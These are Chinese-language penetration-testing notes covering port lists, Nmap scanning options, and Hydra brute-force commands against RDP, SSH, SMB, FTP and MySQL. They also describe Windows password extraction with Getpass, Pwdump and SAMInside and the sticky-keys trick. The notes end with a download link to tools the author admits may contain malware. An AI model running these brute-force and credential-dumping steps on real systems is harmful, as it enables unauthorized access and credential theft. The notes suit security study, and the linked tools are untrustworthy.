扫描技术
主机探测与端口扫描
21 FTP
22 SSH
23 Telnet
25 SMTP
80 HTTP
443 HTTPS
1433 SQL Server
1521 Oracle
3306 MySQL
3389 RDPNmap-扫描之王
重要的常用参数
-sP 扫描主机是否在线(ping扫描)
-p 指定端口范围
-sV 服务版本探测
-O(大写) 启用操作系统探测
-A 全面扫描
-oN 保存txtNmap -sP 10.1.1.1/24 扫描10.1.1.0 整个网段
Nmap -p 21,23-25,3389, 10.1.1.1
Nmap -p 21,23 10.1.1.1 -sV 扫描21,23的服务版本
Nmap -A 10.1.1.1 全面扫描
Nmap -O 10.1.1.1 扫描目标系统版本
Nmap -p 21,23 10.1.1.1 -oN d:\result.txt Hydra 远程暴力破解
Hydra.exe -l a -p 123 10.1.1.1 telnet
Hydra.exe -l a -P d:\password.txt 10.1.1.1 rdp
Hydra.exe -l a -P d:\password.txt 10.1.1.1 smb
Hydra.exe -l a -P d:\password.txt 10.1.1.1 ftp
Hydra.exe -l a -P d:\password.txt 10.1.1.1 ssh
Hydra.exe -l a -P d:\password.txt 10.1.1.1 mysql
Hydra.exe -L d:\user.txt -P d:\password.txt 10.1.1.1 mysql
5次shift破解系统密码
利用PE破解系统密码
远程爆破
nmap
NTscan
Hydra
本地破解:
Getpass 从内存中提取密码(win10之前的系统)
本地暴力破解:
Pwdump 提取sam中的hash值
手工将hash值存储到hash.txt中
使用saminside软件进行暴力破解
网上找的一些小工具,有毒,谨慎下载:https://pan.baidu.com/s/1WrIOTYeWMWMiQv8VD_LmDA 提取码:89wa
